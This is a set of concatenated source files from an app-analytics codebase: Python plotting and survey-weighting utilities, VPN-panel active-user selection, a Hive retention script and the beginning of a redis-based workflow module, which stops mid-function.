g_capped = g_capped.sort('abs_error[{}]'.format(pred_col), ascending=True)
p2, = ax.plot(g_capped['abs_error[{}]'.format(pred_col)],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
color=cols[cnt%len(cols)], lw = 3,
label='Total Apps={}'.format(topapp))
if baseline in _data_.columns:
g_capped = g_capped.sort('abs_error[original]', ascending=True)
p2, = ax.plot(g_capped['abs_error[original]'],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
linestyle='--', color='orange', lw = 3,
label='mydm_v1'.format(topapp))
ax.legend(loc=4, fontsize=15)
plt.title(title, fontsize=14, y=1.02)
plt.xlim(0,xlim)
fmt = '%0.0f%%' # Format you want the ticks, e.g. '40%'
yticks = mtick.FormatStrFormatter(fmt)
ax.xaxis.set_major_formatter(yticks)
ax.yaxis.set_major_formatter(yticks)
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.ylabel('% of Apps', fontsize=15)
plt.xlabel('Relative Error %', fontsize=15)
plt.show()
def cdf_with_topapps_v2(self, data, modelname='Supervised Learning', baseline=None, TOPAPP_Bucket=4, pred_col='pred', xlim=100):
cols = seaborn.color_palette('deep')
_data_ = data.copy()
if pred_col:
_data_['abs_error[{}]'.format(pred_col)] = 100 * np.abs( _data_[pred_col] * 1.0 / _data_['Active Users'] - 1.0)
if baseline in _data_.columns:
_data_['abs_error[original]'] = 100 * np.abs( _data_[baseline] * 1.0 / _data_['Active Users'] - 1.0)
for n, g in _data_.groupby(['Device Type', 'Country']):
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111)
g = g.sort('Active Users', ascending=False)
title = 'Learning Model = %s, %s, %s, Top Apps Buckets'%(modelname, n[0], n[1])
prev_topapp = 0
TOPAPPS = xrange(g.shape[0]/TOPAPP_Bucket, g.shape[0]+1, g.shape[0]/TOPAPP_Bucket)
for cnt, topapp in enumerate(TOPAPPS):
g_capped = g[prev_topapp:topapp].copy()
if pred_col:
g_capped = g_capped.sort('abs_error[{}]'.format(pred_col), ascending=True)
p2, = ax.plot(g_capped['abs_error[{}]'.format(pred_col)],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
color=cols[cnt%len(cols)], lw = 3,
label='topapp={} - {}'.format(prev_topapp, topapp))
if baseline in _data_.columns:
g_capped = g_capped.sort('abs_error[original]', ascending=True)
p2, = ax.plot(g_capped['abs_error[original]'],
(np.arange(g_capped.shape[0])*1.0 / g_capped.shape[0])*100.0,
linestyle='--', color=cols[cnt%len(cols)], lw = 3,
label='mydm_v1_topapp={} - {}'.format(prev_topapp, topapp))
ax.legend(loc=4)
prev_topapp = topapp
plt.title(title)
plt.xlim(0,xlim)
fmt = '%0.0f%%' # Format you want the ticks, e.g. '40%'
yticks = mtick.FormatStrFormatter(fmt)
ax.xaxis.set_major_formatter(yticks)
ax.yaxis.set_major_formatter(yticks)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error %')
plt.show()
def model_training_v2(self, model, x_training, y_training, baseline=None, model_name='Supervised Learning', log=True):
percentile_range = range(25,101,25)
        assert baseline is None or x_training.shape[0] == baseline.shape[0], ValueError
prediction = cross_val_predict(model, x_training, y_training, cv=5)
model.fit(x_training, y_training)
fig, ax = plt.subplots(figsize=(12,10))
ax.scatter(y_training, prediction, label='Rincon Prediction', s=60)
if baseline is not None:
ax.scatter(y_training, baseline, color='red', label='MyDM_v1.1', s=60)
ax.plot([y_training.min(), y_training.max()], [y_training.min(), y_training.max()], 'k--', lw=4)
ax.set_xlabel('GA Measured', fontsize=15)
ax.set_ylabel('MyDM or Rincon Predicted', fontsize=15)
if log:
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_title('{} Overall Active Users Predicted v.s. Measured'.format(model_name),
fontsize=20, y=1.02)
plt.tick_params(axis='both', labelsize=14)
ax.legend(loc=4)
fig.show()
perc = np.percentile(y_training, percentile_range)
prev_mau = y_training.min()
for index, mau in enumerate(perc):
fig, ax = plt.subplots(figsize=(8,6))
tmp = pd.DataFrame(dict(truth=y_training, pred=prediction))
tmp = tmp[(tmp['truth']>=prev_mau)
& (tmp['truth']<=mau)]
ax.scatter(tmp['truth'], tmp['pred'],
label='Rincon Prediction', s=45)
del tmp
if baseline is not None:
tmp = pd.DataFrame(dict(truth=y_training, pred=baseline))
tmp = tmp[(tmp['truth']>=prev_mau)
& (tmp['truth']<=mau)]
ax.scatter(tmp['truth'], tmp['pred'],
color='red', label='MyDM_v1.1', s=45)
del tmp
ax.plot([prev_mau, mau], [prev_mau, mau], 'k--', lw=4)
ax.set_xlabel('GA Measured', fontsize=10)
ax.set_ylabel('MyDM or Rincon Predicted', fontsize=10)
if log:
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_title('%s Active Users Predicted v.s. Measured with MAU in %i%% percentile' % (model_name, percentile_range[index]), y=1.02)
ax.legend(loc=4)
fig.show()
prev_mau = mau
return prediction
<file_sep>/survey/201503/lib/survey_utility.py
__author__ = 'jjanssen'
import numpy as np
import pandas as pd
'''
in: list of (lower, upper) tuples that represent bins; upper == -1 means open-ended.
    `type` is a label used to name the resulting bin column (e.g. 'age').
out: list of dicts containing lower and upper bound and bin name info
'''
def generate_bins(list_of_bin_tuples, type):
dict_list = []
for t in list_of_bin_tuples:
lower_bound = t[0]
upper_bound= t[1]
bin_name = str(lower_bound) + '-' + str(upper_bound)
if(t[1] == -1):
upper_bound = np.inf
bin_name = str(lower_bound) + '+'
bin_info = {'min' : lower_bound, 'max' : upper_bound, str(type)+'_bin' : bin_name}
dict_list.append(bin_info)
return dict_list
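# Illustrative sketch, never called anywhere:
#   generate_bins([(18, 24), (25, -1)], 'age')
# returns
#   [{'min': 18, 'max': 24, 'age_bin': '18-24'},
#    {'min': 25, 'max': inf, 'age_bin': '25+'}]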
'''
in: list of genders, and a list of dicts containing lower and upper bound and bin name info
out: list of dicts containing lower and upper bound, bin name and gender info
'''
def generate_gender_age_bin(gender_list, age_bins):
dict_list = []
for d in age_bins:
for g in gender_list:
age_gender_bin = d.copy()
age_gender_bin['gender'] = g
dict_list.append(age_gender_bin)
return dict_list
'''
in: population_list: list with population numbers per gender/age bucket (same
    order as age_gender_bins)
in: age_gender_bins: list of dicts containing lower and upper bound, bin name
    and gender info
out: dataframe with a population_size per gender/age bin
'''
def generate_gender_age_population_df(population_list, age_gender_bins):
dict_list = []
for index, d in enumerate(age_gender_bins):
d['population_size'] = population_list[index]
dict_list.append(d)
result = pd.DataFrame(data=dict_list)
result.drop(labels=['max','min'], axis=1, inplace=True)
return result
'''
in:
    df: dataframe containing survey information
    demografic: column name of the demographic of interest
    weighting: if True, results are weighted using column 'Weight'
    survey: if 'Q4', different column names apply
    os_list: list of operating systems of devices
    device_list: list of devices
    If BOTH os_list and device_list are empty, the result covers the whole
    population; otherwise it is split by device and OS.
out:
    dataframes containing the distribution of the demographic in absolute
    numbers and in percentages
'''
def calc_distribution_demografic(df, demografic, os_list, device_list, weighting=False, survey=''):
demografic_list = df[demografic].unique().tolist()
demografic_list.sort()
result_cnt = pd.DataFrame(data=demografic_list, columns=[demografic])
result_pct = pd.DataFrame(data=demografic_list, columns=[demografic])
if (len(os_list) == 0 and len(device_list) == 0):
if(weighting == False):
device_os_result = df[[demografic]]
device_os_result['count'] = 1
else:
device_os_result = df[[demografic, 'Weight']]
device_os_result['count'] = 1 * device_os_result['Weight']
device_os_result = device_os_result.drop(labels='Weight', axis=1)
total = device_os_result['count'].count()
device_os_result = device_os_result.groupby(by=demografic).sum()
device_os_result.reset_index(inplace=True)
device_os_result['pct'] = device_os_result['count'] / total * 100
device_os_result['pct'] = np.round(device_os_result['pct'], decimals=2)
pct_name = demografic +'_population_pct'
count_name = demografic +'_population_count'
result_pct[[pct_name]] = device_os_result[['pct']]
result_cnt[[count_name]] = device_os_result[['count']]
elif(len(os_list) > 0 and len(device_list) > 0):
for o in os_list:
for d in device_list:
if (survey == 'Q4'):
if(d == 'phone'):
col_name_1 = 'os_primary_phone'
col_name_2 = 'os_phone'
                        device_os_result = df[(df[col_name_1] == o) | (df[col_name_2] == o)][[demografic, 'Weight']]  # include Weight so the weighting branch below works
elif(d == 'tablet'):
col_name = 'os_tablet'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
else:
if(d == 'phone'):
col_name = 'os_primary_phone'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
elif(d == 'tablet'):
col_name = 'os_primary_tablet'
device_os_result = df[df[col_name] == o][[demografic, 'Weight']]
if(weighting == False):
device_os_result['count'] = 1
else:
device_os_result['count'] = device_os_result['Weight']
device_os_result = device_os_result.drop(labels='Weight', axis=1)
total = device_os_result['count'].count()
device_os_result = device_os_result.groupby(by=demografic).sum()
device_os_result.reset_index(inplace=True)
device_os_result['pct'] = device_os_result['count'] / total * 100
device_os_result['pct'] = np.round(device_os_result['pct'], decimals=2)
pct_name = demografic +'_'+ o +'_' + d + '_pct'
count_name = demografic +'_'+ o +'_' + d + '_count'
result_pct[[pct_name]] = device_os_result[['pct']]
result_cnt[[count_name]] = device_os_result[['count']]
return result_cnt, result_pct
'''
in:
    df: dataframe containing survey information
    weighting: if True, results are weighted using column 'Weight'
    os_list: list of operating systems of devices
    device_list: list of devices
    Only applicable if ethnicity is split across columns; column names should
    contain the substring 'ethni'.
    If BOTH os_list and device_list are empty, the result covers the whole
    population; otherwise it is split by device and OS.
out:
    dataframes containing the distribution of ethnicity in absolute numbers
    and in percentages
'''
def calc_distribution_ethnicity(df, os_list, device_list, weighting=False):
result_pct = pd.DataFrame()
result_cnt = pd.DataFrame()
# find all columns about ethnicity
if (len(os_list) == 0 and len(device_list) == 0):
ethnicity_columns = []
for c in df.columns.values.tolist():
if 'ethni' in c:
ethnicity_columns.append(c)
selection = df[ethnicity_columns].astype(float)
selection['sum'] = selection.sum(axis=1)
        selection[ethnicity_columns] = selection[ethnicity_columns].div(selection['sum'], axis=0)
        if weighting:
            selection = selection.mul(df['Weight'], axis=0)
os_device_result = pd.DataFrame()
os_device_result['cnt'] = selection[ethnicity_columns].T.sum(axis=1)
os_device_result['pct'] = selection[ethnicity_columns].T.sum(axis=1) / len(selection) *100
os_device_result.reset_index(inplace=True)
os_device_result['ethnicity'] = os_device_result['index']
pct_name = 'ethnicity_population_pct'
count_name = 'ethnicity_population_count'
result_pct['ethnicity'] = os_device_result['ethnicity']
result_cnt['ethnicity'] = os_device_result['ethnicity']
result_pct[[pct_name]] = os_device_result[['pct']]
result_cnt[[count_name]] = os_device_result[['cnt']]
else:
for o in os_list:
for d in device_list:
ethnicity_columns = []
for c in df.columns.values.tolist():
if 'ethni' in c:
ethnicity_columns.append(c)
if(d == 'phone'):
col_name = 'os_primary_phone'
selection = df[df[col_name] == o]
elif(d == 'tablet'):
col_name = 'os_primary_tablet'
selection = df[df[col_name] == o]
selection = selection[ethnicity_columns]
selection['sum'] = selection.sum(axis=1)
selection[ethnicity_columns] = selection[ethnicity_columns].div(selection['sum'], axis=0)
os_device_result = pd.DataFrame()
os_device_result['cnt'] = selection[ethnicity_columns].T.sum(axis=1)
os_device_result['pct'] = selection[ethnicity_columns].T.sum(axis=1) / len(selection) *100
os_device_result.reset_index(inplace=True)
os_device_result['ethnicity'] = os_device_result['index']
if (len(result_pct) == 0):
result_pct['ethnicity'] = os_device_result['ethnicity']
result_cnt['ethnicity'] = os_device_result['ethnicity']
pct_name = 'ethnicity' +'_'+ o +'_' + d + '_pct'
cnt_name = 'ethnicity' +'_'+ o +'_' + d + '_cnt'
result_pct[pct_name] = np.round(os_device_result['pct'], decimals=2)
result_cnt[cnt_name] = np.round(os_device_result['cnt'], decimals=2)
return result_cnt, result_pct
'''
in:
    df: dataframe containing survey results
    columns: column names indicating that a respondent owns a device
    os_list: list of operating systems of devices
    weight: boolean indicator if weighting is needed
out:
    dataframe containing the (weighted) device count per respondent
'''
def split_os_nth_device(df, columns, os_list, weight=False):
if(weight):
weights = df.Weight
# get full range of columns we're interested in
df = df[columns]
for c in columns:
# create new columns for each n-th device per OS
for o in os_list:
column_name = c + '_' + str(o)
df[column_name] = df[df[c] == o][c]
    # drop the original columns
df.drop(labels=columns, axis=1, inplace=True)
# replace values by 1 and nan's by 0
df = df.applymap(lambda x: 0 if str(x) == 'nan' else 1)
# weight if needed
if(weight==True):
df = df.mul(weights, axis=0)
return df
'''
in:
    df: dataframe containing survey results
    group_columns: columns that need to be preserved for a later group-by
    stack_columns: columns that need to be merged into one column
    new_column_name: name of the new column
out:
    dataframe containing group_columns and new_column_name
'''
def column_stacker(df, group_columns, stack_columns, new_column_name):
#iterate over columns, pick groupcolumns + columns, append
result = pd.DataFrame()
for s in stack_columns:
stack_frame = df[group_columns + [s]]
stack_frame.rename(columns={s:new_column_name}, inplace=True)
result = result.append(stack_frame, ignore_index=True)
return result
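# Usage sketch: stacking the per-device "shared age" columns into a single column,
# as calc_share_ratio below does; the column names here mirror its age_select list:
#
#   stacked = column_stacker(df,
#                            group_columns=['gender', 'age_bin'],
#                            stack_columns=['age_first_using_phone', 'age_second_using_phone'],
#                            new_column_name='shared_age')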
def calc_share_ratio(df, device, agebins, group_list):
# give appropriate device name to the columns for age and gender
age_select = ['age_first_using_%s','age_second_using_%s', 'age_third_using_%s','age_fourth_using_%s']
gender_select = ['gender_first_using_%s','gender_second_using_%s', 'gender_third_using_%s','gender_fourth_using_%s']
for index, item in enumerate(age_select): age_select[index] = item % device
for index, item in enumerate(gender_select): gender_select[index] = item % device
# select correct columns to stack age & gender for nth devices
df_age_gender = df[group_list + age_select + gender_select]
df_age_stacked = column_stacker(df_age_gender, group_list, age_select, new_column_name='shared_age')
df_gender_stacked = column_stacker(df_age_gender, group_list, gender_select, new_column_name='shared_gender')
df_age_stacked['shared_gender'] = df_gender_stacked['shared_gender']
df_both_stacked = df_age_stacked.apply(bin_gen_age, axis=1)
df_both_stacked['ones'] = 1
# count total number of people shared to per participant bucket
bucket_member_count = df_both_stacked[group_list + ['ones']][~df_both_stacked.age_gender_bin.isnull()].groupby(by=group_list).sum()
# pivot over 'group_list' sum over dummy column 'ones'
shared_bucket_count = df_both_stacked.pivot_table(values='ones',
index=group_list, columns = ['age_gender_bin'], aggfunc=[sum])
shared_bucket_count.columns = shared_bucket_count.columns.droplevel(level=0)
shared_bucket_count.reset_index(inplace=True)
# calculate total & pct for each age bucket
shared_bucket_count['total'] = shared_bucket_count.sum(axis=1, numeric_only=True)
shared_bucket_count[agebins] = shared_bucket_count[agebins].div(shared_bucket_count.total, axis=0)
shared_bucket_count[agebins] = np.round(shared_bucket_count[agebins]*100, decimals=2)
shared_bucket_count[agebins] = shared_bucket_count[agebins].fillna(value=0.0)
shared_bucket_count = shared_bucket_count[group_list+agebins+['total']]
shared_bucket_count['age_gender_bin'] = shared_bucket_count.gender.str.slice(0,1) + ' : ' + shared_bucket_count.age_bin
shared_bucket_count.drop(group_list, axis=1, inplace=True)
shared_bucket_count = shared_bucket_count.reindex_axis(sorted(shared_bucket_count.columns), axis=1)
return shared_bucket_count
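# Sketch of a call to calc_share_ratio; 'iphone' is interpolated into the
# age_*/gender_* column names, and agebins must match the labels produced by
# bin_gen_age (the exact labels here are assumptions):
#
#   ratios = calc_share_ratio(df, device='iphone',
#                             agebins=['18-24', '25-34', '35-44'],
#                             group_list=['gender', 'age_bin'])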
def calc_share_freq(df, device, os, group_list):
app_share_columns = ['app_usage_first_using_%s','app_usage_second_using_%s', 'app_usage_third_using_%s',
'app_usage_fourth_using_%s']
OS_device_columns = ['os_primary_phone', 'os_secondary_phone','os_tertiary_phone', 'os_quaternary_phone']
# give appropriate device name to the columns for age and gender
for index, item in enumerate(app_share_columns): app_share_columns[index] = item % device
# iterate over OS_device_columns, if OS == iOS, select app_share_columns + group_list
app_share = pd.DataFrame()
for idx, c in enumerate(OS_device_columns):
os_nth_device = df[df[c] == os][group_list + [app_share_columns[idx]]]
app_share = app_share.append(os_nth_device)
# stack usage columns
stacked_freq = column_stacker(app_share, group_list, app_share_columns, 'app_usage_phone')
# calculate pct of sharers
sharers = stacked_freq[stacked_freq.app_usage_phone.str.get(0).notnull()]
non_sharers = stacked_freq[stacked_freq.app_usage_phone.str.get(0).isnull()]
share_pct = float(len(sharers)) / float(len(stacked_freq))
# sum num of users by group_list, calculate pct per bin
sharers['ones'] =1
sharers_freq_sum = sharers.groupby(by=group_list + ['app_usage_phone']).sum()
sharers_freq_sum.reset_index(inplace=True)
sharers_freq_sum = sharers_freq_sum.pivot_table(values='ones',index=group_list, columns = ['app_usage_phone'], aggfunc=[sum])
sharers_freq_sum.columns = sharers_freq_sum.columns.droplevel(level=0)
sharers_freq_sum['total'] = sharers_freq_sum.sum(axis=1, numeric_only=True)
column_list = list(set(sharers_freq_sum.columns.values.tolist()) - set(['total']))
sharers_freq_sum[column_list] = sharers_freq_sum[column_list].div(sharers_freq_sum.total, axis=0)
sharers_freq_sum[column_list] = sharers_freq_sum[column_list] * 100
plot_title = 'Sharing frequency in pct per gender / age bin for ' + device + ' ' + os + ' , % sharers: ' + "%.2f" % (share_pct * 100)
return sharers_freq_sum, sharers_freq_sum[column_list].plot(kind='bar', figsize=(20,6), title = plot_title)
def calc_weigted_n_in_household_using(df, device_type):
new_column_name = 'weighted_n_in_household_using'
column_name = 'n_in_household_using_' + device_type
# a respondent reporting no other household users still counts with their own weight;
# otherwise the reported household count is multiplied by the respondent weight
df[new_column_name] = np.where(df[column_name] == 0.0, df.Weight, df[column_name] * df.Weight)
return df
import pandas as pd
import datetime
def get_users_connected_paused(connection, pause):
"""
1540 timestamp
this function creates data frame that contains per day if a user has been active and if it has been using pause
required input data frames:
connection & pause, both as imported using import_data.import_data()
:param connection:
:param pause:
:return:
"""
### create date range per user between min and max active date
agg_function = {'start_at_datetime': 'min',
'end_at_datetime': 'max'}
connection_user_min_max = connection.groupby('device_id', as_index=False).agg(agg_function)
connection_user_min_max = pd.melt(connection_user_min_max, id_vars=['device_id'], value_vars=agg_function.keys(), value_name='date')
connection_user_min_max.set_index('date', inplace = True)
dates_device = connection_user_min_max.groupby('device_id').resample('1d', how='count').reset_index()[['device_id','date']]
dates_device['date_plus_one'] = dates_device.date.apply(lambda x: x + datetime.timedelta(days=1))
dates_devices_connection = pd.merge(dates_device, connection, on='device_id')
### active or not per day per user
dates_devices_connection['active'] = (dates_devices_connection.start_at_datetime >= dates_devices_connection.date) & (dates_devices_connection.end_at_datetime < dates_devices_connection.date_plus_one)
device_connection_per_day = pd.DataFrame(dates_devices_connection.groupby(['device_id','date']).active.max())
### another option is (only shows active dates, so no inactive days):
# active_new = connection[['device_id','start_date','end_date']].drop_duplicates().set_index('device_id').stack().reset_index()[['device_id',0]].drop_duplicates()
### create date range per user between min and max pause date
pause_user_min_max = pause.groupby('device_id', as_index=False).agg(agg_function)
pause_user_min_max = pd.melt(pause_user_min_max, id_vars=['device_id'], value_vars=agg_function.keys(), value_name='date')
pause_user_min_max.set_index('date', inplace = True)
pause_dates_device = pause_user_min_max.groupby('device_id').resample('1d', how='count').reset_index()[['device_id','date']]
pause_dates_device['date_plus_one'] = pause_dates_device.date.apply(lambda x: x + datetime.timedelta(days=1))
dates_devices_paused = pd.merge(pause_dates_device, pause, on='device_id')
### pause or not per day per user
dates_devices_paused['paused'] = (dates_devices_paused.start_at_datetime >= dates_devices_paused.date) & (dates_devices_paused.end_at_datetime < dates_devices_paused.date_plus_one)
device_paused_per_day = pd.DataFrame(dates_devices_paused.groupby(['device_id','date']).paused.max())
### merge pause & connect data
pause_and_connect = pd.merge(device_connection_per_day, device_paused_per_day, left_index=True, right_index=True, how='left')
pause_and_connect.reset_index(inplace=True)
return pause_and_connect
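# Sketch of how the two helpers chain together (frames as produced by
# import_data.import_data(); the dates and window sizes are illustrative):
#
#   pause_and_connect = get_users_connected_paused(connection, pause)
#   final_users = select_final_users('2015-01-10', '2015-01-20', pause_and_connect,
#                                    session, nr_of_days_to_check_before=3,
#                                    nr_of_days_to_check_after=3, all_users_us=True)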
def select_final_users(date_start_to_evaluate, date_end_to_evaluate, pause_and_connect, session, nr_of_days_to_check_before, nr_of_days_to_check_after, all_users_us):
"""
1540 timestamp
required input data frames:
- pause_and_connect as generated using get_users_connected_paused()
- session as imported using import_data.import_data() for getting the countries
note that input data frames should contain nr_of_days_to_check_before days prior to the first day to evaluate and nr_of_days_to_check_after days after the last day to evaluate
nr_of_days_to_check_before and nr_of_days_to_check_after can be both 0 as well, in that case, a user is evaluated as active if it is using vpn that day and has not used pause
all_users_us if True, countries are not assessed, but set to US for all users
"""
dates = pd.date_range(start=date_start_to_evaluate,end=date_end_to_evaluate)
final_selection_of_users = pd.DataFrame()
for day_to_evaluate_datetime in dates:
### first select dates for current date to evaluate
days_to_check_before = day_to_evaluate_datetime - datetime.timedelta(days=nr_of_days_to_check_before)
days_to_check_after = day_to_evaluate_datetime + datetime.timedelta(days=nr_of_days_to_check_after + 1)
day_to_evaluate_date = datetime.date(day_to_evaluate_datetime.year, day_to_evaluate_datetime.month, day_to_evaluate_datetime.day)
days_to_check_before_date = datetime.date(days_to_check_before.year, days_to_check_before.month, days_to_check_before.day)
days_to_check_after_date = datetime.date(days_to_check_after.year, days_to_check_after.month, days_to_check_after.day)
#######
#######
### get good devices
# first remove devices that used pause on evaluated day
potential_devices = pd.DataFrame(pause_and_connect[(pause_and_connect.date == day_to_evaluate_datetime) &
(pause_and_connect.paused != True)]['device_id'])
# select all records from pause_and_connect between nr_of_days_to_check_before evaluated day and nr_of_days_to_check_after evaluated day
potential_devices_before_after = pd.merge(pause_and_connect[(pause_and_connect.date >= days_to_check_before) &
(pause_and_connect.date < days_to_check_after)],
potential_devices,
on='device_id')
# select devices from potential_devices_before_after that were active before evaluated date
active_devices_before = pd.DataFrame(potential_devices_before_after[(potential_devices_before_after.date < day_to_evaluate_datetime) &
(potential_devices_before_after.active)].device_id.unique(),
columns=['device_id'])
# select devices from potential_devices_before_after that were active after evaluated date
active_devices_after = pd.DataFrame(potential_devices_before_after[(potential_devices_before_after.date > day_to_evaluate_datetime) &
(potential_devices_before_after.active)].device_id.unique(),
columns=['device_id'])
# select devices from that were active before and after evaluated date (combine active_devices_before & active_devices_after)
active_devices_before_after = pd.merge(active_devices_before,
active_devices_after,
on='device_id')
# merge active_devices_before_after with potential_devices.
# this way only devices get selected that were active before and after the evaluated date.
# this makes sure that the first and last day of activity are never taken into account
# the only exception to this rule is when nr_of_days_to_check_after = 0 and/or nr_of_days_to_check_before = 0
if nr_of_days_to_check_before == 0 and nr_of_days_to_check_after == 0:
good_devices_on_evaluated_date = pd.DataFrame(pause_and_connect[(pause_and_connect.date == day_to_evaluate_datetime) &
(pause_and_connect.paused != True) &
(pause_and_connect.active == True)]['device_id'])
else:
good_devices_on_evaluated_date = pd.merge(potential_devices,
active_devices_before_after,
on='device_id')
### finalize selection of users including the country they have to be assigned to per day
if all_users_us == True:
final_selection_of_users_day = good_devices_on_evaluated_date
final_selection_of_users_day['country'] = 'US'
final_selection_of_users_day['date'] = day_to_evaluate_date
final_selection_of_users = final_selection_of_users.append(final_selection_of_users_day, ignore_index=True)
else:
### assess country per user based on location in session data frame
country_devices = session[['startdate','device_id','country']].drop_duplicates()
country_devices = country_devices[country_devices.country.isnull() == False]
users_on_date_to_evaluate = country_devices[country_devices.startdate == day_to_evaluate_date]
countries_per_user_on_date_to_evaluate = pd.merge(users_on_date_to_evaluate,
users_on_date_to_evaluate.groupby('device_id').country.count().reset_index(),
on='device_id')
# if a user is active in one country, then determination of country per device is straightforward:
selected_users_country = countries_per_user_on_date_to_evaluate[countries_per_user_on_date_to_evaluate.country_y == 1][['startdate','device_id','country_x']]
selected_users_country = pd.merge(selected_users_country, good_devices_on_evaluated_date, on='device_id')
selected_users_country.columns = ['startdate','device_id','country']
# devices not using vpn for a day don't have a country for that day,
# therefore look at the first session before and the first session after if there are no sessions on the day that is evaluated
country_devices_for_date = country_devices[(country_devices.startdate >= days_to_check_before_date) &
(country_devices.startdate < days_to_check_after_date)]
good_devices_on_evaluated_date_and_countries = pd.merge(good_devices_on_evaluated_date, users_on_date_to_evaluate, on='device_id', how='left')
good_devices_on_evaluated_date_and_nr_countries = pd.DataFrame(good_devices_on_evaluated_date_and_countries.groupby('device_id').country.count())
### if days before and after are not taken into account for seeing if a user is active or not, this is not done for assessing the country either
if nr_of_days_to_check_before == 0 and nr_of_days_to_check_after == 0:
final_selection_of_users_day = pd.merge(good_devices_on_evaluated_date_and_countries, pd.DataFrame(good_devices_on_evaluated_date_and_nr_countries[good_devices_on_evaluated_date_and_nr_countries.country == 1].index), on='device_id')[['device_id','country']]
### if days before and after are > 0, than for the assessment of countries per user this is also taken into account
else:
no_country_devices = pd.DataFrame(good_devices_on_evaluated_date_and_nr_countries[good_devices_on_evaluated_date_and_nr_countries.country == 0].reset_index()['device_id'])
no_country_devices_before_and_after = pd.merge(no_country_devices, country_devices, on='device_id')
no_country_devices_before_and_after = no_country_devices_before_and_after[no_country_devices_before_and_after.country.isnull() == False]
max_date_before = country_devices[(country_devices.startdate < day_to_evaluate_date) &
(country_devices.startdate >= days_to_check_before_date)].groupby('device_id').startdate.max().reset_index()
latest_country_before = pd.merge(no_country_devices_before_and_after,
max_date_before,
on=['device_id','startdate']).sort('device_id')
min_date_after = country_devices[(country_devices.startdate > day_to_evaluate_date) &
(country_devices.startdate < days_to_check_after_date)].groupby('device_id').startdate.min().reset_index()
first_country_after = pd.merge(no_country_devices_before_and_after,
min_date_after,
on=['device_id','startdate']).sort('device_id')
nr_countries_first_day_after = first_country_after.groupby('device_id').country.count().reset_index()
nr_countries_latest_day_before = latest_country_before.groupby('device_id').country.count().reset_index()
first_single_country_after = pd.merge(first_country_after, nr_countries_first_day_after[nr_countries_first_day_after.country == 1], on='device_id')
latest_single_country_before = pd.merge(latest_country_before, nr_countries_latest_day_before[nr_countries_latest_day_before.country == 1], on='device_id')
countries_right_before_and_after = pd.merge(latest_single_country_before, first_single_country_after, on='device_id')
countries_right_before_and_after = countries_right_before_and_after[countries_right_before_and_after.country_x_x == countries_right_before_and_after.country_x_y][['device_id','country_x_x']]
countries_right_before_and_after.columns = ['device_id','country']
final_selection_of_users_day = countries_right_before_and_after.append(selected_users_country[selected_users_country.country.isnull() == False][['device_id','country']],
ignore_index=True)
final_selection_of_users_day['date'] = day_to_evaluate_date
final_selection_of_users = final_selection_of_users.append(final_selection_of_users_day, ignore_index=True)
return final_selection_of_users
<file_sep>/aa_au_model/hive_ql/ad_device_retention.sql
DROP TABLE IF EXISTS ad_devices_in_period;
CREATE TABLE ad_devices_in_period AS
SELECT
v.device_id,
v.platform,
v.model,
v.type,
min(v.datestr) as enter_date
FROM
vpn_new_device_info v
WHERE
datestr >= '2014-10-23' and v.platform == 'iOS'
GROUP BY
v.device_id,
v.platform,
v.model,
v.type
;
DROP TABLE IF EXISTS ad_connections_per_day;
CREATE TABLE ad_connections_per_day AS
SELECT
v.device_id,
v.datestr
FROM
vpn_sample_data_connection_session v
GROUP BY
v.device_id,
v.datestr
;
DROP TABLE IF EXISTS ad_connections_min_date;
CREATE TABLE ad_connections_min_date AS
SELECT
v.device_id,
min(v.datestr) as enter_date
FROM
ad_connections_per_day v
JOIN
ad_devices_in_period d on d.device_id = v.device_id
GROUP BY
v.device_id
;
DROP TABLE IF EXISTS ad_connections_retentions_per_day;
CREATE TABLE ad_connections_retentions_per_day AS
SELECT
v.device_id,
v.datestr as active_date,
d.platform,
d.model,
d.type,
m.enter_date
FROM
ad_connections_per_day v
JOIN
ad_devices_in_period d on d.device_id = v.device_id
JOIN
ad_connections_min_date m on m.device_id = v.device_id
LEFT JOIN
vpn_sample_data_pause_resume_session p on p.device_id = v.device_id and p.datestr = v.datestr
WHERE
p.device_id is null
GROUP BY
v.device_id,
v.datestr,
d.platform,
d.model,
d.type,
m.enter_date
;
DROP TABLE IF EXISTS to_ds_ad;
CREATE TABLE to_ds_ad
(
device_id STRING,
active_date DATE,
platform STRING,
model STRING,
type STRING,
enter_date DATE
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/joep_vpn_android_churn_analysis/android_sessions_since_20141218/';
INSERT OVERWRITE TABLE to_ds_ad
select
device_id,
active_date,
platform,
model,
type,
enter_date
FROM
ad_connections_retentions_per_day
;<file_sep>/aa_au_model/hive_scripts/workflow/module/workflow.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import yaml
import os
import sys
import uuid
import redis
import time
import traceback
import datetime
from slugify import slugify
from Queue import PriorityQueue
from rq import Queue
from executor import Executor
from constants import Status, ONE_MONTH, ErrorNumber, STATUS_LABEL
def _set_work_start_time(wf, start_time):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
r.hset(
wf.status_id, '_st', start_time.strftime('%Y-%m-%d %H:%M:%S')
)
wf.start_time = start_time
r.expire(wf.status_id, ONE_MONTH)
def _get_work_start_time(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
return datetime.datetime.strptime(
r.hget(wf.status_id, '_st'), '%Y-%m-%d %H:%M:%S')
def log(wf, info):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
log_content = r.hget(wf.status_id, '_log') or ''
t = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
log_content = log_content + '\n' + t + ' ' + info
r.hset(wf.status_id, '_log', log_content)
def _clear_status(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
all_keys = r.hgetall(wf.status_id)
for k in all_keys:
if not k.startswith('_') or k in ('_st', '_et', '_rt', '_log') or k.startswith('_lock_'):
r.hdel(wf.status_id, k)
def _clear_join_lock(wf):
r = redis.Redis(host=wf.redis_host, port=wf.redis_port)
